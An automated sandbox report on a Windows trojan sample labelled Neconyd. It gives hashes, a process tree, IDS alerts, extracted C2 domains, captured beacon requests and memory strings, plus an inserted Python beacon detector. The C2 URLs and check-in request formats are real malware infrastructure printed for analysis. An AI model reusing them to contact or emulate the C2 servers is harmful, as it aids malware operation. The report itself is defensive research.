Windows Analysis Report
cnzWgjUhS2.exe

Overview

General Information

Sample name: cnzWgjUhS2.exe (renamed because the original name is a hash value)
Original sample name: Trojan.Danger.ATA_virussign.com_10b089f41384787f77a9de73a9c55e4b.exe
Analysis ID: 1506967
MD5: 10b089f41384787f77a9de73a9c55e4b
SHA1: b5cd02bedf0c963c95b17937f334b4eb950a22ed
SHA256: ce28f0ea14877935233268bb240e0aa2013eb133a179fee671144939539fdc7a
Detection

Neconyd
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Neconyd
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cnzWgjUhS2.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\cnzWgjUhS2.exe" MD5: 10B089F41384787F77A9DE73A9C55E4B)
    • omsecor.exe (PID: 6644 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: BA4DF80E161C9C58860725AAC02D99E4)
      • omsecor.exe (PID: 3868 cmdline: C:\Windows\System32\omsecor.exe MD5: 9AF480E9873460DD811C495A948A78AE)
        • omsecor.exe (PID: 564 cmdline: C:\Windows\SysWOW64\omsecor.exe /nomove MD5: 9AF480E9873460DD811C495A948A78AE)
  • cleanup
{"C2 url": ["http://ow5dirasuek.com/", "http://lousta.net/", "http://mkkuei4kdsz.com/"]}
Source                                          Rule                 Description            Author        Strings
Process Memory Space: cnzWgjUhS2.exe PID: 6600  JoeSecurity_Neconyd  Yara detected Neconyd  Joe Security
Process Memory Space: omsecor.exe PID: 6644     JoeSecurity_Neconyd  Yara detected Neconyd  Joe Security
Process Memory Space: omsecor.exe PID: 3868     JoeSecurity_Neconyd  Yara detected Neconyd  Joe Security
Process Memory Space: omsecor.exe PID: 564      JoeSecurity_Neconyd  Yara detected Neconyd  Joe Security

No Sigma rule has matched
Timestamp                        SID      Severity  Classtype                                      Source IP        Source Port  Destination IP   Destination Port  Protocol
2024-09-08T06:09:37.868813+0200  2016998  1         A Network Trojan was detected                  192.168.2.4      49730        193.166.255.171  80                TCP
2024-09-08T06:10:01.919142+0200  2018141  1         A Network Trojan was detected                  52.34.198.229    80           192.168.2.4      49739             TCP
2024-09-08T06:10:01.919142+0200  2037771  1         A Network Trojan was detected                  52.34.198.229    80           192.168.2.4      49739             TCP
2024-09-08T06:09:37.850228+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49749        193.166.255.171  80                TCP
2024-09-08T06:09:38.569119+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49730        193.166.255.171  80                TCP
2024-09-08T06:10:00.064197+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49731        193.166.255.171  80                TCP
2024-09-08T06:10:00.848191+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49738        64.225.91.73     80                TCP
2024-09-08T06:10:01.919056+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49739        52.34.198.229    80                TCP
2024-09-08T06:10:23.623919+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49740        193.166.255.171  80                TCP
2024-09-08T06:10:45.111484+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49741        193.166.255.171  80                TCP
2024-09-08T06:10:45.834962+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49743        64.225.91.73     80                TCP
2024-09-08T06:10:46.699343+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49744        52.34.198.229    80                TCP
2024-09-08T06:11:08.188034+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49745        193.166.255.171  80                TCP
2024-09-08T06:11:29.708209+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49746        193.166.255.171  80                TCP
2024-09-08T06:11:30.431154+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49747        64.225.91.73     80                TCP
2024-09-08T06:11:31.264187+0200  2015786  1         Malware Command and Control Activity Detected  192.168.2.4      49748        52.34.198.229    80                TCP

          AV Detection

Source: cnzWgjUhS2.exe | Avira: detected
Source: http://lousta.net/161/343.html | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/ | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/100/325.html)L | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/179/569.html; | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/100/325.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/161/343.htmll | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/130/71.htmlcrosoft | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/179/569.htmlQZ | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/179/569.html3 | Avira URL Cloud: Label: phishing
Source: http://lousta.net/895/196.html# | Avira URL Cloud: Label: phishing
Source: http://lousta.net/601/938.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/347/423.htmlt?E& | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/y | Avira URL Cloud: Label: phishing
Source: http://lousta.net/895/196.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.htmlz | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.htmlp | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/130/71.htmlr&& | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/179/569.htmliZ# | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/179/569.htmleZ | Avira URL Cloud: Label: phishing
Source: http://lousta.net/303/619.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/976/76.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.html( | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.html$ | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.htmlP& | Avira URL Cloud: Label: phishing
Source: http://lousta.net/303/619.html= | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.html& | Avira URL Cloud: Label: phishing
Source: http://lousta.net/467/386.htmlQ= | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/59/409.htmlk7 | Avira URL Cloud: Label: phishing
Source: http://lousta.net/161/343.html= | Avira URL Cloud: Label: phishing
Source: http://lousta.net/976/76.htmlmswsock.dll.mui | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/179/569.htmli | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/130/71.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/347/423.html( | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/59/409.html | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/88/221.htmlV | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/179/569.htmlGU | Avira URL Cloud: Label: phishing
Source: http://lousta.net/ | Avira URL Cloud: Label: phishing
Source: http://lousta.net/&X | Avira URL Cloud: Label: phishing
Source: http://lousta.net/347/423.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/895/196.html_ | Avira URL Cloud: Label: phishing
Source: http://lousta.net/303/619.htmlEc | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/179/569.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/467/386.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/161/343.htmle | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/100/325.html7 | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.html; | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/179/569.htmloZ | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/59/409.html(&Z& | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.htmlasuek.com5 | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/en-GB | Avira URL Cloud: Label: phishing
Source: http://lousta.net/161/343.htmlT | Avira URL Cloud: Label: phishing
Source: http://lousta.net/601/938.htmlshqos.dll.mui | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/ | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/88/221.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/968/405.htmlN | Avira URL Cloud: Label: phishing
Source: C:\Windows\SysWOW64\omsecor.exe | Avira: detection malicious, Label: TR/Downloader.Gen
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Avira: detection malicious, Label: TR/Downloader.Gen
Source: 5.2.omsecor.exe.400000.0.unpack | Malware Configuration Extractor: Neconyd {"C2 url": ["http://ow5dirasuek.com/", "http://lousta.net/", "http://mkkuei4kdsz.com/"]}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Windows\SysWOW64\omsecor.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Joe Sandbox ML: detected
Source: cnzWgjUhS2.exe | Joe Sandbox ML: detected
Source: cnzWgjUhS2.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\cnzWgjUhS2.exe | Code function: 0_2_0040ABD9 FindFirstFileW,FindClose, 0_2_0040ABD9
Source: C:\Users\user\Desktop\cnzWgjUhS2.exe | Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose, 0_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_0040ABD9 FindFirstFileW,FindClose, 5_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose, 5_2_00408248

          Networking

Source: Network traffic | Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.4:49730 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49731 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49739 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49738 -> 64.225.91.73:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49730 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.4:49739
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49747 -> 64.225.91.73:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49744 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.4:49739
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49743 -> 64.225.91.73:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49748 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49741 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49745 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49740 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49746 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49749 -> 193.166.255.171:80
Source: Malware configuration extractor | URLs: http://ow5dirasuek.com/
Source: Malware configuration extractor | URLs: http://lousta.net/
Source: Malware configuration extractor | URLs: http://mkkuei4kdsz.com/
Source: global traffic | HTTP traffic detected:
    GET /303/619.html HTTP/1.1
    From: 133702421766157995
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /895/196.html HTTP/1.1
    From: 133702421766157995
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /100/325.html HTTP/1.1
    From: 133702421766157995
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /179/569.html HTTP/1.1
    From: 133702421766157995
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
    Host: ow5dirasuek.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /467/386.html HTTP/1.1
    From: 133702422009751771
    Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /976/76.html HTTP/1.1
    From: 133702422009751771
    Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /130/71.html HTTP/1.1
    From: 133702422009751771
    Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /59/409.html HTTP/1.1
    From: 133702422009751771
    Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
    Host: ow5dirasuek.com
    Connection: Keep-Alive
    Cookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768601|1725768601|0|1|0
Source: global traffic | HTTP traffic detected:
    GET /347/423.html HTTP/1.1
    From: 133702422009751771
    Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /601/938.html HTTP/1.1
    From: 133702422009751771
    Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /88/221.html HTTP/1.1
    From: 133702422009751771
    Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /968/405.html HTTP/1.1
    From: 133702422009751771
    Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
    Host: ow5dirasuek.com
    Connection: Keep-Alive
    Cookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768646|1725768601|22|2|0
Source: global traffic | HTTP traffic detected:
    GET /161/343.html HTTP/1.1
    From: 133702422009751771
    Via: opfcsi{>;56bttA;346_ojzA97f89j88f55=96ghd9h:;;g:71863i63
    Host: lousta.net
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 64.225.91.73
Source: Joe Sandbox View | IP Address: 193.166.255.171
Source: Joe Sandbox View | IP Address: 52.34.198.229
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | ASN Name: FUNETASFI
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\cnzWgjUhS2.exe | Code function: 0_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle, 0_2_00407036
Source: global traffic | DNS traffic detected: DNS query: lousta.net
Source: global traffic | DNS traffic detected: DNS query: mkkuei4kdsz.com
Source: global traffic | DNS traffic detected: DNS query: ow5dirasuek.com
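The thirteen captured requests above share one shape: a GET for /<n>/<n>.html, a purely numeric From header, an obfuscated Via header, no User-Agent (the report's "HTTP GET or POST without a user agent" signature), and, on the ow5dirasuek.com requests, the snkz/btst cookies that Suricata SIDs 2018141 and 2037771 flag as AnubisNetworks sinkhole markers. The Python below is an added example, not part of the Joe Sandbox report or its signatures: it parses raw requests rebuilt from the captured traffic, flags the beacon shape, reports the sinkhole cookies, and decodes the From value as a Windows FILETIME (100 ns ticks since 1601-01-01 UTC). That FILETIME reading is an assumption of mine, not something the report states; the check is that both observed values decode to 04:09:36 and 04:10:00 UTC, which is 06:09:36 and 06:10:00 in the report's UTC+2 timestamps, within a second or so of the first alert from each process.

```python
"""Detect the Neconyd-style HTTP beacon captured in this report and decode its From header.

Added example, not part of the Joe Sandbox report. SAMPLE_REQUESTS is constructed
from two of the captured requests plus one benign request for contrast; reading
the From header as a FILETIME is an assumption that the code checks against the
capture timestamps rather than a documented property of the family.
"""
import re
from datetime import datetime, timedelta, timezone

SAMPLE_REQUESTS = [
    # First request of the first process, as captured (host lousta.net).
    "GET /303/619.html HTTP/1.1\r\n"
    "From: 133702421766157995\r\n"
    "Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0\r\n"
    "Host: lousta.net\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    # Request to the sinkholed domain, carrying the cookies the sinkhole set.
    "GET /59/409.html HTTP/1.1\r\n"
    "From: 133702422009751771\r\n"
    "Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26\r\n"
    "Host: ow5dirasuek.com\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768601|1725768601|0|1|0\r\n\r\n",
    # Constructed benign browser request: must not be flagged.
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.org\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Connection: Keep-Alive\r\n\r\n",
]

BEACON_PATH = re.compile(r"^/\d+/\d+\.html$")
SINKHOLE_COOKIES = {"snkz", "btst"}          # cookie names seen from 52.34.198.229 in this report
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # Via values contain ':' themselves, so split once
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def filetime_to_datetime(value):
    """Interpret a decimal string as a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=int(value) // 10)


def classify(raw):
    """Return findings for one request: beacon shape, sinkhole cookies, decoded From header."""
    method, path, headers = parse_request(raw)
    cookies = {c.split("=", 1)[0].strip() for c in headers.get("cookie", "").split(";") if c.strip()}
    finding = {
        "host": headers.get("host"),
        "beacon": (
            method == "GET"
            and BEACON_PATH.match(path) is not None
            and "user-agent" not in headers
            and "from" in headers
            and "via" in headers
        ),
        "sinkholed": bool(cookies & SINKHOLE_COOKIES),
        "from_time": None,
    }
    if headers.get("from", "").isdigit():
        finding["from_time"] = filetime_to_datetime(headers["from"])
    return finding


def scan(requests):
    """Classify every request; returns one findings dict per input, in order."""
    return [classify(r) for r in requests]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

A client that presents snkz/btst cookies has already completed a round trip with a sinkholed domain, so the cookie check is a cheap triage signal on proxy logs independent of the beacon heuristic; the From value is worth decoding because it appears to anchor the start time of each infected process, which the analyst can line up with the process tree.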
Source: cnzWgjUhS2.exe, omsecor.exe, omsecor.exe, 00000008.00000002.2986204609.0000000000195000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/
Source: omsecor.exe, 00000008.00000002.2986475132.000000000059E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/&X
Source: omsecor.exe, 00000008.00000002.2986475132.000000000059E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986204609.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986475132.000000000059A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/161/343.html
Source: omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/161/343.html=
Source: omsecor.exe, 00000008.00000002.2986475132.000000000059A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/161/343.htmlT
Source: omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/161/343.htmle
Source: omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/161/343.htmll
Source: omsecor.exe, 00000001.00000002.1987110192.000000000060E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/303/619.html
Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/303/619.html=
Source: omsecor.exe, 00000001.00000002.1987110192.000000000060E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/303/619.htmlEc
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/347/423.html
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/347/423.html(
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/347/423.htmlt?E&
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/467/386.html
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/467/386.htmlQ=
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/601/938.html
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/601/938.htmlshqos.dll.mui
Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/895/196.html#
Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/895/196.html_
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/976/76.html
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/976/76.htmlmswsock.dll.mui
Source: omsecor.exe, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/
Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/100/325.html
Source: omsecor.exe, 00000001.00000002.1987110192.0000000000628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/100/325.html)L
Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/100/325.html7
Source: omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/130/71.html
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/130/71.htmlcrosoft
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/130/71.htmlr&&
Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/88/221.html
Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/88/221.htmlV
Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/en-GB
Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/y
Source: omsecor.exe, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/
Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/179/569.html
Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/179/569.html3
Source: omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/179/569.html;
Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/179/569.htmlGU
Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/179/569.htmlQZ
